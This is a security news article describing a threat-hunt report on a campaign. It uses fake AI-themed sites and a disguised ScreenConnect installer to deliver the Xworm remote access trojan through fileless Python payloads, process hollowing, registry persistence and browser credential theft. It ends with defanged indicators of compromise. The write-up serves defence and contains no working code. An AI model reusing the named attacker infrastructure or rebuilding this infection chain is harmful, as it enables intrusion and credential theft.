The SpiderLabs Threat Hunt Team recently discovered a cyber campaign in which threat actors used the genuine ScreenConnect remote management application as a weapon to spread the Xworm Remote Access Trojan (RAT) through a multi-phase infection chain.
The attack begins with social engineering tactics, including phishing, malvertising, and deceptive social media posts, luring users to fake AI-themed websites like gptgrok[.]ai, which redirects to suspicious domains such as anhemvn6[.]com.
Victims are tricked into downloading a disguised installer masquerading as an MP4 file, such as “Creation_Made_By_GrokAI.mp4 Grok.com,” which is actually the ScreenConnect.ClientSetup.msi binary.
Analysis reveals that attackers manipulated Authenticode signatures to embed malicious configurations within the legitimate digital signature, allowing the modified binary to drop and execute in the Temp directory while bypassing endpoint detection and response (EDR) alerts.
Pre-configured to run hidden, the client establishes a remote session to attacker-controlled servers like instance-keoxeq-relay[.]screenconnect[.]com using parameters such as “?e=Access&y=Guest&h=instance-keoxeq-relay[.]screenconnect[.]com&p=443&s=44f
Execution Chain Involves Fileless Payloads
Once remote access is secured, the campaign progresses to execution via a dropped batch file, “X-META Firebase_crypted.bat,” which invokes mshta.exe to run obfuscated scripts.
This leads to cmd.exe downloading and extracting a ZIP archive, “5btc.zip,” from anhemvn4[.]com, creating a “xmetavip” folder on the C: drive.
Within this, a renamed pythonw.exe (as pw.exe) executes Base64-encoded commands to fetch and run obfuscated Python code from a GitHub repository at github[.]com/trieule99911/vianhthuongbtc, including files like “basse64.txt.”
This fileless approach evades static detection, facilitating process injection into legitimate browsers like chrome.exe and msedge.exe using process hollowing (T1055.012) on a hidden desktop (T1564.003).
Persistence is established via registry run keys (T1547.001), modifying HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun with values mimicking system components, such as “Windows Security,” to auto-execute “backup.bat” on login, which re-runs similar encoded Python commands from GitHub files like “buquabua.txt.”
Imperative of Human-Led Threat Hunting
Further analysis shows credential access attempts (T1555.003) targeting browser files in Google Chrome, Microsoft Edge, and Mozilla Firefox, alongside discovery via WMI queries for OS details (T1082) and antivirus software (T1518.001).
The GitHub repository, created just a week before the attacks, hosts 11 obfuscated, Base64-encoded Python files divided into persistence creators and complex payloads attributed to Xworm RAT, a malware-as-a-service offering.
One file, “Exppiyt.txt,” reveals a command-and-control (C2) IP: 5[.]181[.]165[.]102:7705, undetected on VirusTotal at analysis time.
This campaign highlights adversaries’ exploitation of AI branding to enhance social engineering efficacy, bypassing EDR through hidden behaviors that required manual timeline reviews in tools like Defender.
SpiderLabs emphasizes the limitations of automated detection, underscoring the value of proactive threat hunting to identify such evasive threats, combining human expertise with investigative rigor to mitigate risks in evolving cyber landscapes.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| URLs | hxxps://gptgrok[.]ai hxxps://anhemvn6[.]com hxxps://anhemvn4[.]com/5btc[.]zip hxxps://github[.]com/trieule99911/vianhthuongbtc (and associated raw.githubusercontent[.]com file paths for basse64.txt, backpuppure.txt, etc.) |
| C2 IP | 5[.]181[.]165[.]102:7705 |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
